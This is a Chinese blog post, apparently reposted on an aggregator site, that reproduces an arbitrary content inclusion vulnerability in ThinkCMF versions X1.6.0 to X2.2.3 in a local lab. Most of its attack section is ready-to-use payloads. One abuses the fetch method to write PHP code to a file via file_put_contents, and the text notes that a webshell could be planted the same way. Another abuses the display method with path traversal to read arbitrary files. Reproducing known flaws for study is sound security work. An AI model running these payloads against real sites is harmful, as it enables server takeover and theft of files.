ThinkCMF框架任意内容包含

Posted yang34

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ThinkCMF框架任意内容包含相关的知识,希望对你有一定的参考价值。

更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。

ThinkCMF是一款基于php+mysql开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。
ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。
每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。
影响版本:
ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3
本地环境搭建:

技术图片

搭建完成后如下图

 技术图片

第一种:

通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件,这里写入phpinfo,当然这里可以直接写webshell拿管控权限,payload:

?a=fetch&templateFile=public/index&prefix=‘‘&content=<php>file_put_contents(‘test.php‘,‘<?php phpinfo(); ?>‘)</php>

技术图片

 访问写入的文件http://127.0.0.1/thinkcmfx/test.php

 技术图片

第二种

通过构造a参数的display方法,实现任意内容包含漏洞,payload:

/?a=display&templateFile=README.md

技术图片

跨路径读取

技术图片

 技术图片

http://127.0.0.1/thinkcmfx/?a=display&templateFile=../../../../../../yangyyy.txt

 技术图片

 技术图片

更多内容,欢迎关注微信公众号:信Yang安全,期待与您相遇。

以上是关于ThinkCMF框架任意内容包含的主要内容,如果未能解决你的问题,请参考以下文章

ThinkCMF_X1.6.0-X2.2.3框架任意内容包含漏洞的简单分析复现(附自动化验证脚本)

ThinkCMF介绍和漏洞初探

thinkcmf怎么添加系统常量

thinkcmf安装后

如何安装thinkcmf-5.0.180901

ThinkCMF任意文件包含漏洞复现